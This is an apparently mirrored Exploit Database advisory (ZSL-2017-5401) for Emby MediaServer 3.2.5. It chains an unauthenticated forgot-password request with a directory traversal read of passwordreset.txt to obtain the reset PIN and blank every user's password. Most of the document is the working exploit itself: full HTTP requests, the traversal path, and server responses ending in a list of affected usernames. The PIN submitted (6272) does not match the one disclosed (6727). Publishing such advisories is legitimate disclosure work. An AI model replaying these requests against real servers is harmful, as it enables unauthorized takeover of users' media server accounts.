Emby MediaServer 3.2.5 – Password Reset

• Exploit Database
• 75 阅读

• 作者： LiquidWorm
  日期： 2017-04-30
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/41947/

• Emby MediaServer 3.2.5 Password Reset Vulnerability
  
  
  Vendor: Emby LLC
  Product web page: https://www.emby.media
  Affected version: 3.2.5
  3.1.5
  3.1.2
  3.1.1
  3.1.0
  3.0.0
  
  Summary: Emby (formerly Media Browser) is a media server designed to organize,
  play, and stream audio and video to a variety of devices. Emby is open-source,
  and uses a client-server model. Two comparable media servers are Plex and Windows
  Media Center.
  
  Desc: The issue can be triggered by an unauthenticated actor within the home network
  (LAN) only. The attacker doesn't need to specify a valid username to reset the
  password. He or she can enter a random string, and using the file disclosure issue
  it's possible to read the PIN needed for resetting. This in turn will disclose all
  the valid usernames in the emby server and reset all the passwords for all the users
  with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
  access to the emby media server management interface.
  
  Tested on: Microsoft Windows 7 Professional SP1 (EN)
   Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
   Ubuntu Linux 14.04.5
   MacOS Sierra 10.12.3
   SQLite3
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2017-5401
  Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
  
  SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
  
  
  22.12.2016
  
  --
  
  
  1. First we initiate the Forgot Password feature from within our home network:
  ------------------------------------------------------------------------------
  
  http://10.211.55.3:8096/web/forgotpassword.html
  
  
  2. Then, we type any random username and hit submit:
  ----------------------------------------------------
  
  POST /emby/Users/ForgotPassword HTTP/1.1
  Host: 10.211.55.3:8096
  Connection: keep-alive
  Content-Length: 32
  accept: application/json
  Origin: http://10.211.55.3:8096
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
  x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
  content-type: application/x-www-form-urlencoded; charset=UTF-8
  Referer: http://10.211.55.3:8096/web/forgotpassword.html
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.8,mk;q=0.6
  DNT: 1
  
  EnteredUsername=RandomusUsuarius
  
  
  
  3. You will get an alert message (Windows/Linux):
  -------------------------------------------------
  
  The following file has been created on your server and contains instructions on how to proceed:
  
  C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
  
  -- OR --
  
  /var/lib/emby-server/passwordreset.txt
  
  
  4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
  ----------------------------------------------------------------
  
  GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
  Host: 10.211.55.3:8096
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Encoding: gzip, deflate, sdch
  Accept-Language: en-US,en;q=0.8
  Connection: close
  
  HTTP/1.1 200 OK
  X-UA-Compatible: IE=Edge
  Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
  Access-Control-Allow-Origin: *
  Vary: Accept-Encoding
  ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
  Cache-Control: public
  Expires: -1
  Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
  Content-Type: text/plain
  Date: Tue, 28 Feb 2017 12:14:51 GMT
  Content-Length: 164
  Connection: close
  
  Use your web browser to visit:
  
  http://10.211.55.3:8096/web/forgotpasswordpin.html
  
  Enter the following pin code:
  
  6727
  
  The pin code will expire at 91
  
  
  
  5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
  -----------------------------------------------------------------------------------------------------------------------------
  
  POST /emby/Users/ForgotPassword/Pin HTTP/1.1
  Host: 10.211.55.3:8096
  Connection: keep-alive
  Content-Length: 9
  accept: application/json
  Origin: http://10.211.55.3:8096
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
  x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
  content-type: application/x-www-form-urlencoded; charset=UTF-8
  Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.8,mk;q=0.6
  DNT: 1
  
  Pin=6272
  
  ---
  
  We get the message:
  
  Passwords have been removed for the following users. To login, sign in with a blank password.
  
  testingus
  test321
  beebee
  admin
  ztefan
  lio
  miko
  dni
  embyusertest
  joxypoxy
  test123
  thricer
  teppei
  admin2
  delf1na
  

  PowerShell

  Copy